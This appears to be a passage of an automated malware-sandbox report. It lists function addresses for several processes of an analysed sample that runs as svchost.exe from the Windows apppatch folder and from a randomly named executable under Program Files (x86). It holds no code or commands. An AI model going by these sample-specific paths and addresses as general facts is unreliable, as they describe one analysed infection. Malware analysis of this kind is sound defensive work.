Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D36F02_2_029D36F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DAE002_2_029DAE00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A3FB02_2_029A3FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8FC02_2_029A8FC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E6FE32_2_029E6FE3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029C7F602_2_029C7F60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D54F02_2_029D54F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DE4E02_2_029DE4E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8DA02_2_029A8DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014561E35_2_014561E3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014179A05_2_014179A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144D0E05_2_0144D0E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014440F05_2_014440F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01436B605_2_01436B60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01417BC05_2_01417BC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01412BB05_2_01412BB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144F2405_2_0144F240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01449A005_2_01449A00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144B2C05_2_0144B2C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014442D05_2_014442D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014422F05_2_014422F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143D5805_2_0143D580
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01448D905_2_01448D90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01447F405_2_01447F40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01451F605_2_01451F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BF805_2_0142BF80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014437905_2_01443790
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144D7B05_2_0144D7B0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014176505_2_01417650
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144BE505_2_0144BE50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144A6605_2_0144A660
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0144DE805_2_0144DE80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0122E9805_2_0122E980
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123A1905_2_0123A190
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0124099D5_2_0124099D
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_012433605_2_01243360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_012393405_2_01239340
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123EBB05_2_0123EBB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0121D3805_2_0121D380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01234B905_2_01234B90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123BA605_2_0123BA60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01208A505_2_01208A50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123D2505_2_0123D250
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123F2805_2_0123F280
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01208DA05_2_01208DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123E4E05_2_0123E4E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_012354F05_2_012354F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01227F605_2_01227F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01203FB05_2_01203FB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01246FE35_2_01246FE3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01208FC05_2_01208FC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123AE005_2_0123AE00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_012336F05_2_012336F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0123C6C05_2_0123C6C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_012356D05_2_012356D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013879A06_2_013879A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013C61E36_2_013C61E3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B40F06_2_013B40F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BD0E06_2_013BD0E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013A6B606_2_013A6B60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01382BB06_2_01382BB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01387BC06_2_01387BC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B9A006_2_013B9A00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BF2406_2_013BF240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B22F06_2_013B22F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B42D06_2_013B42D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BB2C06_2_013BB2C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B8D906_2_013B8D90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013AD5806_2_013AD580
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013C1F606_2_013C1F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B7F406_2_013B7F40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BD7B06_2_013BD7B0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013B37906_2_013B3790
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BF806_2_0139BF80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BA6606_2_013BA660
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013876506_2_01387650
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BBE506_2_013BBE50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013BDE806_2_013BDE80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135A1906_2_0135A190
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0136099D6_2_0136099D
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0134E9806_2_0134E980
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013633606_2_01363360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013593406_2_01359340
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135EBB06_2_0135EBB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01354B906_2_01354B90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0133D3806_2_0133D380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135BA606_2_0135BA60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328A506_2_01328A50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135D2506_2_0135D250
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135F2806_2_0135F280
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328DA06_2_01328DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013554F06_2_013554F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135E4E06_2_0135E4E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01347F606_2_01347F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01323FB06_2_01323FB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01366FE36_2_01366FE3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328FC06_2_01328FC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135AE006_2_0135AE00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013536F06_2_013536F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013556D06_2_013556D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135C6C06_2_0135C6C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03236B6010_2_03236B60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03212BB010_2_03212BB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03217BC010_2_03217BC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03249A0010_2_03249A00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324F24010_2_0324F240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032422F010_2_032422F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324B2C010_2_0324B2C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032442D010_2_032442D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032179A010_2_032179A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032561E310_2_032561E3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324D0E010_2_0324D0E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032440F010_2_032440F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03251F6010_2_03251F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03247F4010_2_03247F40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324D7B010_2_0324D7B0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BF8010_2_0322BF80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324379010_2_03243790
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324A66010_2_0324A660
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321765010_2_03217650
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324BE5010_2_0324BE50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324DE8010_2_0324DE80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323D58010_2_0323D580
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03248D9010_2_03248D90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A934010_2_030A9340
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B336010_2_030B3360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0308D38010_2_0308D380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A4B9010_2_030A4B90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AEBB010_2_030AEBB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078A5010_2_03078A50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AD25010_2_030AD250
